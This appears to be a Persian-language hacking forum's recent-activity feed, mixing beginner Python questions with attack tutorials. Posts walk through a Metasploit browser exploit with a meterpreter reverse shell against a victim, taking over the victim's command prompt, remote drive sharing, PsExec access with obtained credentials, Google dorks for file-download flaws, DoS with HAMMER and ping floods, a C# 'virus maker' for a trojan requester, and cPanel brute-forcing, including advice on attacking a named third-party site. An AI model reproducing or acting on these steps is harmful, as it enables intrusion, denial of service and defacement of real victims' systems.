رفتن به مطلب
انجمن تیم امنیتی گارد ایران

آخرین ارسالی ها

در حال نمایش تمامی مطالبی که ارسال شده در 0 روز گذشته.

نوع مطالب


  • از زمان آخرین بازدید من
  • روز های خاص
  • بازه زمانی خاص
  • در آخرین

  • شروع

    پایان

این جریان به طور خودکار بروزرسانی می شود

  1. دیروز
  2. مطلب کپی شده ایشون حتی به خودشون زحمت ندادن یه بار بخوننش که لااقل اسم سایتی که از روش برداشتن نیوفته! لینک اثبات
  3. ممنون عالی بود واقعا خوشم اومد مشخصه زحمت کشیدید واقعا مرسی فقط چند تا مورد اینکه کد هاتون رو توی قالب کد قرار بدید این شکلی : private string Dev32() { string coder = "using System; " + Environment.NewLine; coder += "using System.Drawing;" + Environment.NewLine; coder += "using System.Windows.Forms;" + Environment.NewLine; coder += "namespace " + textBox1.Text + Environment.NewLine; coder += "{" + Environment.NewLine; coder += "class Program" + Environment.NewLine; coder += "{" + Environment.NewLine; coder += "static void Main(string[] args)" + Environment.NewLine; coder += "{" + Environment.NewLine; coder += @"MessageBox.Show(""Hello Dev32"");" + Environment.NewLine; coder += "}" + Environment.NewLine; coder += "}" + Environment.NewLine; coder += " }" + Environment.NewLine; return coder; } ممنون میشم تمام کد هارو دوباره این شکلی واسم بفرستی ممنون واقعا و اینکه من موردی که دارم اینه که تروجانی که کدش هست رو چجوری بسازم عین ویروس نیست نیاز به یه آیپی و ... داره حتمی ولی کلا نمیدونم چجوری خوشحال میشم بیشتر از C# پست بزاری واقعا خوبه
  4. سلام و وقت بخیر شاید برای شما هم جالب باشه که برنامه ای بسازید که خروجی نرم افزار بده بهتون مثل ویروس میکرها و یا کامپایلر ها و ... آموزشی که درباره اش قراره بحث کنیم در اصل ساخت کامپایلر هستش ما میتونیم یه کامپایلر با ویژه گی هایی که دوست داریم درست کنیم من میخوام در این پست یه برنامه ای بسازم که مخاطبم بصورت کلیکی بتونه برنامه ای که میخواد رو بسازه یه پروژه سی شارپ در ویژوآل استودیو استارت کنید فرقی نداره فریم وورکش چند باشه کار خیلی ساده ای هستش فقط یکم دقت لازمه یک عدد دکمه و یدونه هم تکست باکس فعلا کافیه بعد کتابخونه های زیر رو اضافه کنید using System.CodeDom.Compiler; using Microsoft.CSharp; حالا یه کد برای ویروس باید آماده کنید فرض کنید تکه کد زیر یه ویروسه using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Windows.Forms; namespace virus32 { class Program { static void Main(string[] args) { MessageBox.Show("Hello Virus32"); } } } یادتون باشه هر جور کد و برنامه ای میتونه باشه حتی برنامه یا ویروس گرافیکی و ویندوز فرم ما میخواییم مخاطب با کلیک کردن روی دکمه ، این ویروس براش ساخته شه یه متد از جنس رشته تو برنامه تعریف میکنیم و کدهای بالا رو تبدیل به یه رشته کرده برای یه متغییر نسبتش میدیم private string Dev32() { string coder = "using System; " + Environment.NewLine; coder += "using System.Drawing;" + Environment.NewLine; coder += "using System.Windows.Forms;" + Environment.NewLine; coder += "namespace " + textBox1.Text + Environment.NewLine; coder += "{" + Environment.NewLine; coder += "class Program" + Environment.NewLine; coder += "{" + Environment.NewLine; coder += "static void Main(string[] args)" + Environment.NewLine; coder += "{" + Environment.NewLine; coder += @"MessageBox.Show(""Hello Dev32"");" + Environment.NewLine; coder += "}" + Environment.NewLine; coder += "}" + Environment.NewLine; coder += " }" + Environment.NewLine; return coder; } توی متد Dev32 یه رشته به اسم coder تعریف کردم و کدهای ویروسم رو براش تیکه تیکه توضیح دادم حالا روی دکمه دوبار کلیک کنید و کدهای زیر رو بنویسید try { CompilerParameters Params = new CompilerParameters(); Params.GenerateExecutable = true; Params.ReferencedAssemblies.Add("System.dll"); Params.ReferencedAssemblies.Add("System.Drawing.dll"); Params.ReferencedAssemblies.Add("System.Windows.Forms.dll"); Params.OutputAssembly = textBox1.Text + ".exe"; Params.CompilerOptions = " /target:winexe"; string Source = Dev32(); CompilerResults results = new CSharpCodeProvider().CompileAssemblyFromSource(Params, Source); MessageBox.Show("برنامه ایجاد شد"); } catch { MessageBox.Show("مشکلی رخ داده است"); } کل ماجرای ویروس میکرها همین بود کدها و شکل های مختلفی دارن که اونا سلیقه ای هستن امیدوارم مفید بوده باشه این رو مخصوص برای MR.D3F417 نوشتم که امیدوارم منظورش رو درست متوجه شده باشم و مفید بوده باشم و کمی کمک کنم خدانگهدار روز خوبی داشته باشید
  5. Dev32.12.7

    یک تروجان حرفه ای

    راحته میتونی بسازی عزیز همین الان یک تایپیک جدید ایجاد میکنم تو سی شارپ آموزش میدم امیدوارم مفید باشه دوست عزیز
  6. MR.D3F417

    یک تروجان حرفه ای

    نه نه منظورم همون بود یک نرم افزار تروجان بسازه اما برای ویندوز که سخت هم نباشه و اینکه میخواستم بدونم چطوری منی که مودم ندارم تروجانمو بسازم و اصلا این نرم افزار اسمش چیه از کجا بگیرمش و ... مرسی
  7. SRX

    هک ویندوز ۷ با metasploit

    چند دفه باید یه حرفو زد علنا دارید قوانین رو تک تک زیر پا میگذارید اخطار دیگه ای در کار نخواهد بود..
  8. Dev32.12.7

    هک ویندوز ۷ با metasploit

    سلام و وقت بخیر. لطفا درست استفاده کنید! تو این روش میتونیم با باگی که مرورگر پیش فرض ویندوز 7 داره نفوذ کنیم. 1- متااسپلویت رو باز کنید و تا لود کامل صبر کنید. 2- دستورات زیر رو به ترتیب وارد میکنیم: use exploit/windows/browser/msl0_046_shortcut_icon_dllloader set payload windows/meterpreter/reverse_tcp set srvhost ip set LHOST ip show options exploit 3- به جای IP ای پی خودمون رو وارد میکنیم و تا قبل از گرفتن دسترسی نباید آی پیمون عوض بشه. 4- بعد از زدن دستور Exploit خطی به ما نشون داده میشه: Using URL: http://ip:80/ 5- اکسپلویت ما اجرا شده کافیه لینکی که برای ما چاپ شده رو از هر روش (چت،ایمیل و...) به قربانی ارسال کنیم. [+] منتظر میمونیم تا قربانی لینک رو اجرا کنه [+] بعد از اینکه قربانی لینک رو اجرا کرد در محیط متااسپلویت ما یسری خط ها اضافه میشه. کمی منتظر میمونیم. حالا یکم کارای جالب تری انجام میدیم Virus32.Blog.ir ابتدا دستور زیر رو وارد میکنیم: sessions -i 1 بعد از زدن دستور بالا میتونیم اطلاعات سیستم قربانی رو ببینیم: sysinfo به بخش جالب تر میرسیم کافیه دستور زیر رو وارد کنیم تا Cmd قربانی رو در دست بگیریم: Shell حالا ما تونستیم به Cmd قربانی نفوذ کنیم. میتونیم پیغامی مبنی بر هک شدن یا دیفیس به قربانیمون نشون بدیم: msg * Parham.Apk is HeRe [+] Dont Touch Baby :PP خط فرمان هر سیستم یعنی مدیریت کل سیستم...!
  9. Dev32.12.7

    یک تروجان حرفه ای

    سلام و وقت بخیر . عزیز بله میشه ساخت ولی مثله نرم افزار هایی که تروجان میسازن و بعد از طریق همون نرم افزار دسترسی میگرفتی جمله ی بالا رو نفهمیدم یعنی یک برنامه بسازی که تروجان بسازه بعد با همان که خودش ساخته ازش دسترسی بگیری؟ فکر کنم بشه
  10. Dev32.12.7

    صدای سیستم

    با سلام. با نوشتن کد زیر در نوت پد میتوانید ببیند سیستم شما مرد است یا زن! CreateObject("SAPI.SpVoice").Speak"Developer" سپس فایل را با فرمت vbs ذخیره کنید این به شما میگوید developer سلامت و موفق و باشید
  11. MR.D3F417

    یک تروجان حرفه ای

    سلام من خودم تروجان هام رو با اسکریپت های لینوکسی مینویسم ولی میخوام بدونم یک تروجان که بشه با ویندوز ساخت برای پلتفرم های ویندوز و یا حتی لینوکس مثله نرم افزار هایی که تروجان میسازن و بعد از طریق همون نرم افزار دسترسی میگرفتی میخواستم بدونم از اون ها هست هنوز کار میکنن؟ و بهترینشون کدومه و اینکه مشکل پورت فرواردینگ رو چکار کنم اصلا برای این نرم افزار ها نیازه؟؟ که پورت فروارد بشه چون من کلا مودم ندارم ممنون میشم کمک کنید در این زمینه مرسی
  12. هفته گذشته
  13. این پست در ادامه ی پست قبل هست که تونستیم به خط فرمان ویندوز نفوذ کردیم Net share Drivemane=C:\*.* این درایو c رو با اسم drivemane سیو میکنه !! توجه کنید که همه ی دستورات رو بعد از نفوذ به Cmd قربانی، وارد می کنیم !! وگرنه درایو خودتون شیر میشه! اما قدم بعد دیدن فایل های Share شده ی یه سیستمه. برای این کار وارد MyComputer شده و در بخش آدرس، آی پی رو به این صورت وارد میکنیم : \\192.168.1.101 بعدش یوزر و پسورد و ok. سوالی بود در خدمتم
  14. برای پیدا کردن ای پی طرف نرم افزار Wireless Network Watcher رو دان کنید هم یوزرشو میاره هم ای پی بازم تو یوزر موندین تو سی ام دی ping -a ip رو وارد کنید البته دقت داشته باشید بجای ip ای پی طرف رو بزنید
  15. با سلام خدمت دوستان گرامی ما خیلی ساده با داشتن ۳ چیز میتوانیم به cmd نفوذ کنیم ۱.آی پی ۲.username 3.password اینا رو که بدست آوردید ابزار PsTools رو از لینک بالا دانلود کنید در مسیر C:\Windows\System32 اکسترکت کنید. 2_ از خاموش بودن آنتی ویروس و فایروال ویندوزتون مطمین بشید. 3_ Cmd رو با Run As Administrator اجراش کنید. 4_ آی پی یا نام سیستم متصل به شبکه رو پیدا کنید. 5_ دستور زیر رو وارد کنید : 6_ به جای IP آی پی قربانی به جای Username نام کاربری قربانی و به جای PassWord هم پسورد قربانی رو وارد کنید. اگه سیستم قربانی پسورد نداشت بخش -p به بعد رو ننویسید. تبریک میگم! شما الان به cmd نفوذ کردید
  16. سلام من hoic رو قبلا داشتم خیلی خوبه دان کنید کسی میخواد داس نخوره ۱.هاست ابری ۲.cloudflare که البته دومی دور زدن داره ولی سخت تر خلاصه فایروالم بگذارید تا شاید ریسکش بیاد پایین تو داس هم آی پی مجدد دیدید بلاک کنید ..... امیدوارم حداقل یکی از نکات جدید بوده باشه و مفید واقع شده باشم تا درودی دیگر بدرود!
  17. Dev32.12.7

    باگ FLD

    انگار دورک ها نیافتادند inurl:"download.php?file=" inurl:"download.php?src=" inurl:"download.php?url=" inurl:"download.php?f=" inurl:"download.php?book_file=" inurl:"download.php?di_key=" inurl:"download.php?path=" inurl:"download.php?dfile=" inurl:"download.php?get=" inurl:"download.php?u=" inurl:"dl.php?file=" inurl:"down.php?dd=" inurl:"down.php?name=" inurl:"down.php?downfile" inurl:"down.php?arq=" inurl:"file.php?src=" inurl:"download.php?downloadFile" inurl:"download.php?page=" اینها هستند
  18. Dev32.12.7

    باگ FLD

    سلام و وقت بخیر. دورک ها: بله درسته هویج! که به کمک این فایل ها به دیتابیس سایت دسترسی پیدا میکند موفق و موید و سلامت باشید
  19. سلام این یک ذره پیشرفته تره توضیحی در مورد این ابزار ابزار HAMMER چیه؟ یه ابزار خیلی عالی برای دیداس که با زبان پایتون 3 نوشته شده و از سرعت بشدت بالایی برخورداره ((به دلیل برنامه نویسی چند نخی)) . https://github.com/cyweb/hammer از این لینک دانلود کنید توجه => فایل هدر را از ابزار جدا نکنید! خب برید تو فایلی که اکسترکت کردید و SHIFT رو نگه داشته و راست کلیک کنید و open in command.... رو بزنید. خب حالا من یکم از سوییچ هاش بگم براتون : -p مال پورت -s ایپی -h راهنما -t توربو توجه! پورت را اول اسکن کنید همین جوری ۸۰ وارد نکنید! python hammer.py -s ip مثال ☝ پیشرفته تر با بات نت ها هست که خیلی قویه و دیگه نمیگم خودمم خیلی کم بلدم باید برنامه نویسی بلد باشید هر چی بگردید هیچی پیدا نمیکنید من زیرو رو کردم
  20. Dev32.12.7

    آموزش ابتدایی داس

    سلام و وقت بخیر. این اولین بار وارد این سایت میشم و میخوام اولی رو در مورد ابتدایی ترین dos berdm اولین چیزی که خودم یاد گرفتم همین بود و یک سایت بسیار ضعیف رو کردم این دستور را در cmd تایپ کنید تا حمله شروع شود تعداد بسته پکیج است (بالای ۲۰۰۰ بزن ) یک چهارم به تو وارد می شود! Ip هم آی پی پی سایت که با ping url هست جای url دامین این همان پینگ هست که سوییچ را دست کاری کرد سعی کردم خیلی آسون توضیح بدم سوالی چیزی داشتید بپرسید
  21. خب ببینید این قابلیت برا اینه که اونی که داره کد میزنه ، دیگه هی نیاد پرانتز باز و بسته کنه و شما با باز کردن پرانتز ) دیگه نیازی نیست حتما ( رو هم بذارید و خود ادیتور و ide ها اینکارو انجام میدن براتون برای راحتی کار .... هر چند از اونجایی که تازه کار هستین بهتره فعلا با idle پایتون کار کنید و این راحتی ها در دسترستون نباشه .. ضمنا وقتی شما مینویسین print("hello") اون علامت | (پایپ Pipe) که معمولا حالت چمشک زدن داره و پوزیشن جایی که میخواید تایپ کنید رو مشخص میکنه ، همیشه بین پرانتز میمونه (حداقل تا جایی که خودم دیدم) چرا؟ چون معمولا پرانتز ها باز میشن که چیزی داخلشون نوشته بشه و خیلی کم پیش میاد شما تابعی رو که داخل برنامه تعریف میکنید ، بدون ارگومان باشه (از اونجایی که تازه کارید فعلا این مطلب رو داشته باشید تا بعدا که تابع نویسی و برنامه نویسی تابعی رو یاد گرفتید متوجه میشید قضیه این "ارگومان" ها چیه) به نظرم زدن یه کلید سمت راست - right arrow key - خیلی سخت نباشه ها امیدوارم انقدری که درگیر سرعت نوشتن و راحتی کد زنی هستین ، درگیر چیزای دیگه ای هم تو برنامه نویسی باشین که مشخص کنه شما یه برنامه نویس هستین نه یه کد نویس ... سرعت در کد زدن خیلی مهم نیست ...
  22. سلام دوستان وقت بخیر من دارم یه دوره پایتون میبینم سطحم خیلی پایینه . یه سوال دارم شاید بنظرتون خنده دار باشه یا خیلی ساده ولی من خودمم گفتم نوبم وقتی میخوام یچی بنویسم که این علامتو () داره به مشکل میخورم . مثلا میخوام بنویسم print('hello world') , و برم خط بعدی وقتی اینترو میزنم print('hello world خط اوله ولی نمیدونم چرا ') میاد پایین خط دوم برای همین مجبور میشم که یا با موس کلیک چپ کنم روی سمته راسته پرانتز دوم و بعدش اینتر بزنم که خط دومم تمیز باشه یا اینکه یا با فلش های کیبورد سمت راستو دوبار بزنم بعدش اینتر . حالا من با این کار فعلا مشکلی ندارم اما بعده ها بنظرم این کار سرعت کد زنی رو میاره پایین روش خاصی هستش که رفتن به خط بعدی بعده پرانتز اسونتر بشه؟
  23. این دو تا بتونی کمک کنی ممنون میشم:

    https://quera.ir/problemset/contest/72882/پرگوشت  

    https://quera.ir/problemset/contest/6082/آسمان شکر آباد

      اگر لطف کنی و توضیح هم بدی ممنون میشم

  24. mehrabi110

    هک سایت های جوملا

    سلام من یه سایت جوملا رو بررسی کردم آپدیت نشده و ورژن 2.5.8 هست 35 باگ از جوملا داده راهنمایی میکنید Joomla! Core Arbitrary File Upload (2.5.0 - 3.8.7) bug_report URL: https://study.viam.ru/ Attack Details arrow_drop_up Current Joomla! version: 2.5.28. Joomla! versions between 2.5.0 and 3.8.7 are affected. Vulnerability Description arrow_drop_up Joomla! Core is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to properly verify user-supplied input. Depending on the server configuration, an attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. Joomla! Core versions ranging from 2.5.0 and up to and including 3.8.7 are vulnerable. Discovered by Joomla! Core Arbitrary File Upload (2.5.0 - 3.8.7)
  25. بله امکانش هست. اگر سی پنل سایت قابل دسترسی باشد از طریف پورت 2083 میتونید بروت فورس انجام بدید روی سی پنل و شاید موفق شدید وارد بشید. به عنوان مثال دسترسی به صفحه سی پنل همین انجمن گارد ایران به این صورت هست: https://guardiran.org:2083
  1. نمایش فعالیت های بیشتر

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...